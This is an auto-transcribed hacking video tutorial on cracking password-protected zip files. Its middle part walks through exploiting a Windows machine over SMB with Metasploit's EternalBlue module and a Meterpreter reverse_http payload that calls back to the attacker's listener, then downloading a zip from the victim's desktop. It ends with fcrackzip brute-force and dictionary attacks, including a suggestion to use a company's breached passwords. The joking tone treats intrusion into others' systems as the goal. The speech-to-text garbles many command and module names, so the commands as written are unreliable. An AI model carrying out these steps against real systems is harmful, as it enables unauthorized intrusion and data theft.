know why you're here you want to know
how to crack the file that you just
gotten zip file format but you have no
idea what's the password well you're
here to learn just that I mean I know
you I know what you're thinking we're
all hackers or maybe I'm a hacker a
script Katie whatever the case is I'll
show you how to do just that
[Music]
but before we get started packing is
illegal if you get caught hacking do not
tell them you know who is Mr hack alive
it's fine even if you tell them you know
who's Mr hackaloy because I know some
things about you that you don't even
know no I'm just kidding I have no idea
what's your home address I have no idea
what's your name I have no idea your
email or your password any of that I
have no idea okay so first of all you
have a Target file so this could be a
file that you have perhaps downloaded
from the internet you found some kind of
file or someone send you an email or you
go to the file system sharing photo
whatever case is you manage to download
the Fable when you open it up there is a
password prompt and you have no idea
what is the password in order to open up
the file it's okay because the whole
idea of today's tutorial is to learn
about how to get that password without
knowing the password and then after that
we have two options here or option
number one is where you are going to use
what we call a boot Force attack so
Brute Force attack is basically trying
all possible combinations of characters
symbols and so on so forth into to the
Target password in order to break it
open so it could be starting from a a
and then a a b and so on so forth all
the way until you have exhausted all
those characters against the target fall
sounds pretty easy isn't it it actually
really is super simple to do the very
first thing you want to do is to be able
to create a zip file I mean without the
zip fault what are you going to crack
it's pretty obvious isn't it so the
first thing you can do is I can do a
right click on a Windows computer I
click on a new and then I can of course
select say types document and let's call
this
password.txt and let's go ahead and open
this up so in password this is going to
be my really secure notepad file all
right and what happens here is that this
allows us to store all of our passwords
which is again a fantastic way of saving
and knowing what passwords you have and
of course one of those simple passwords
I have is hacker Loy is very handsome
okay so this is a super important file
that we're going to save right now that
I've saved it I go in and close it once
you close it the next thing you can do
now is do it right click right go to use
a software like say 7 0 and click add to
Archive and from add to Archive select
under archive format zip and then right
here we have something very important
called encryption this is the place
where you're going to set the pattern
and I will not tell you what is the
password in order to open this follow-up
so we will be using the cracking tools
to help us do just that so let me go
ahead and enter the password here okay
so you have no idea what is a password
and neither will I tell you what is the
password until we cracked it so that
makes it more mysterious go ahead and
click ok
okay so once you have that done you can
see right here on the bottom left
password dot zip this is the file that
we are targeting and of course if you're
in Linux what you can do now is you can
go ahead and say create a file so I can
do a touch secure password.txt for
example okay and of course I can do
mouse pad secure password.txt and open
it up enter of course the hacker alloy
is very handsome and finally to create
this super simple password protected zip
file all you have to do is add a pseudo
zip enter the password in this case I'll
enter one two three four five six seven
eight secure password.zam
securepassword.txt hit enter on that all
right enter your super user do
okay that's it done all right now we
have managed the password protect our
ZIP file next up what we can do here is
to go ahead and Target the machine all
right from here what we will do is we'll
exploit a vulnerability onto the target
system or computer or phone or whatever
the case is or someone sending a file
you manage to get a file from a system
from a file directory whatever cases
this is something much more cool because
we are hackers right so we want to do
something more exciting that looks super
cool like yeah this guy's a hacker even
though it is much easier way to do it so
what I can do here is I can say search
Eternal all right and I can say use one
which is exploit Windows SMB all right
ms010ps exec all right so go ahead and
use that and what I can do next now is I
can set the payload set
payload windows x64 or I followed by
meter Prater right followed by says
reverse underscore HTTP hit enter on
that enter show options so you want to
set the L host so in this case we have
set L hose which is the IP address of
The Listener so this is the colonics IP
address hit enter on that okay you can
enter ifconfig to figure out what this
IP address is using next up you enter in
the r host so our host is for the Target
IP address you're going after so in this
case when one two one six eight dot zero
to 197 and you'll be saying okay how can
I know the IP addresses of all these
different devices within the network so
the top left corner under information
gathering you can use tools like Live
host identification or even Network
import scanners to help you scan across
the network trying to figure out what
are those devices that are available for
you to Target against and once you're
ready go ahead and hit enter on that and
next up all you're going to do is enter
explore in three two one hit enter and
boom you can see right here we have the
following okay we have now opened up the
session and of course I can enter help
and we can see that we are in okay we
are literally having full limit control
of the entire computer and what we can
do next is to go ahead and see the over
into the users all right of course here
we can enter our last and we can see the
list of all those different folders We
can access into right now we can see the
over in users CD over into loyalum here
all right and of course we're targeting
the desktop the reason we're targeting
the desktop because this is typically
the place we have all of those different
types of files especially dot zip files
which could be password protected or
even better to do not password protected
at all and once we're here we can enter
LS to look at the file that we want to
Target so in this case we can look at
the password.zip file here that we want
to go after and what we can do now is go
ahead and enter download
password.zip hit enter on that and you
can see right here we have already
downloaded it doing my previous exploit
and has been now skip because it's the
same file so right here we have the
following instructions okay so we have F
crack and after which we're using the
Brute Force attack the character set and
the option that we're using and then for
ball so that we know what's going on and
finally to use unzip with the target
file okay once you're ready go ahead and
hit enter on that and you can see right
here we're starting the Brute Force
attack against the target file so we can
see here checking password and so on so
we can see the different tries the
different characters that we can use
while we're at it what we can do now is
go ahead and use the second option to
specify a password file that we can use
to Target against the password protected
zip file so in this case we have
dictionary password default that we're
using in this case it's in USR share
with list common password.txt again it
could be rockview.txt whichever that you
want to use or possibly if you're
targeting against a specific company or
business perhaps they have all those
passwords that are Exposed on the
internet because of certain data
breaches and in that case you could
possibly use that too so now we're set
have used unset and a followed by the
Target fault so which one do you think
will be faster once you're ready go
ahead hit enter on that and boom that's
it you can see right here we found the
password and right here we have the
password.zip file and all we get to do
now is double click on it and click on
to extract okay and we can save it
wherever we want to so in this case just
drop it in the same directory or
whatever click extract and now it asks
for your password and of course we
already know the password go ahead and
enter that click OK and boom that's it
done we can see a new file that has been
created right now and all we're going to
do is just go ahead and open up the file
right so that file is password.txt we
can look for it right here this is the
one double clicked on it hackerloy is
very handsome okay and that's it I hope
you learned something valuable and the
best thing to do right now is to set all
of your passwords to hackaloy is very
handsome